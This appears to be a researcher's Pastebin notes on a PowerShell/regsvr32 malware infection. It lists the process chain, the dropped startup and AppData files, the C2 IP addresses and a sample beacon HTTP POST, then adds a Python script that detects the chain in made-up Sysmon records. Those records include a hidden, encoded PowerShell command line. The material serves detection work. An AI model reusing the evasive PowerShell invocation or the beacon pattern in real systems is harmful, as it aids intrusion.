Neonprimetime

Powershell Registry Malware

Sep 16th, 2016
explorer.exe opened --> mshta.exe which opened --> powershell.exe which opened --> regsvr32.exe

which
accessed startup\<random>.lnk
accessed AppData\Local\<random>\<random>.bat
Batch script TEXT : start "" "C:\Users\xxxxx\AppData\Local\<random>\<random>.77af

accessed AppData\Roaming\<random>\<random>.77af049f3

did HTTP POSTs that successfully got out to the internet
23.5.169.12 port 80 (SEE BELOW) and many other IPs: 38.18.245.106, 48.215.246.159, 186.150.30.244, etc.
accessed cmd.exe

Sample HTTP POST (there were many like this)

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 103.195.103.77
Pragma: no-cache
Content-Length: 380
Connection: Keep-Alive
X-BlueCoat-Via: b482d65b63647542

  27. <Redacted possibly base64 ish>XPGjOqUo7vk4UbnskbnCpIxmzmW+cIFdQZzQNNWHLdtBQ/fjsiMMzGt+lkAUAnHaNx9frGe/pUx765TqasgQLsveRynHeA7HE1+0jQ3ffN2F7C5osAF2O1Pb4f3g8YvC7AaM+xRJTproGQI1iJj2w6MH7FnqEmmkTiWcSXWv9oYJ/8ZEwnBjrMPS7uxP5DADpr4piOhsX0ZLyiGNgnZ2/NVQZB92XwpyV9ynxV8tWH6qXzT0GtCIBG9UvS+AnrvgLVm4AenLPwc+ZMldJVdU5K1/vECmRB7Buf3paVETRGRWoYrWYso/x2lYUkPAQJJI+MrITvCOmhhnlwUc0+aIatgx6tsNVYY5zhzJw
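
A detection pass over the process chain and file names in the notes above, as an added example that is not part of the paste: it walks constructed Sysmon-style process-creation records, flags any process whose ancestry contains mshta.exe > powershell.exe > regsvr32.exe, and flags command lines that reference a file under AppData with a hex-looking extension like the .77af / .77af049f3 payloads. All pids, paths and command lines in EVENTS are made up.

```python
import re

# Constructed Sysmon-style process-creation records modelled on the chain in the paste; made up.
EVENTS = [
    {"pid": 10, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 20, "ppid": 10, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "C:\Users\xxxxx\AppData\Local\rnd1\rnd2.hta"'},
    {"pid": 30, "ppid": 20, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -nop -ep bypass -enc AAAA"},
    {"pid": 40, "ppid": 30, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"regsvr32.exe /s C:\Users\xxxxx\AppData\Roaming\rnd3\rnd4.77af049f3"},
    {"pid": 50, "ppid": 40, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c start "" "C:\Users\xxxxx\AppData\Local\rnd5\rnd6.77af"'},
]

CHAIN = ["mshta.exe", "powershell.exe", "regsvr32.exe"]
# A file under AppData\Local or \Roaming whose extension is 4+ hex chars (.77af, .77af049f3).
ODD_PAYLOAD = re.compile(r'appdata\\(?:local|roaming)\\[^\\"]+\\[^\\"]+\.[0-9a-f]{4,}\b', re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def lineage(events, pid):
    """Image basenames from the root process down to pid (root first)."""
    by_pid = {e["pid"]: e for e in events}
    names = []
    while pid in by_pid:
        names.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return names[::-1]

def has_chain(events, pid, chain=CHAIN):
    """True if chain appears contiguously in the ancestry of pid."""
    names = lineage(events, pid)
    return any(names[i:i + len(chain)] == chain
               for i in range(len(names) - len(chain) + 1))

def detect(events):
    """Map pid -> reasons for every record worth an analyst's attention."""
    hits = {}
    for e in events:
        reasons = []
        if has_chain(events, e["pid"]):
            reasons.append("mshta>powershell>regsvr32 ancestry")
        if ODD_PAYLOAD.search(e["cmd"]):
            reasons.append("hex-style extension under AppData")
        if reasons:
            hits[e["pid"]] = reasons
    return hits
```

On the constructed records, detect() flags the regsvr32.exe and cmd.exe processes on both counts and nothing else.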

******
More FROM @neonprimetime security

http://pastebin.com/u/Neonprimetime
https://www.virustotal.com/en/USER/neonprimetime/
https://twitter.com/neonprimetime
https://www.reddit.com/USER/neonprimetime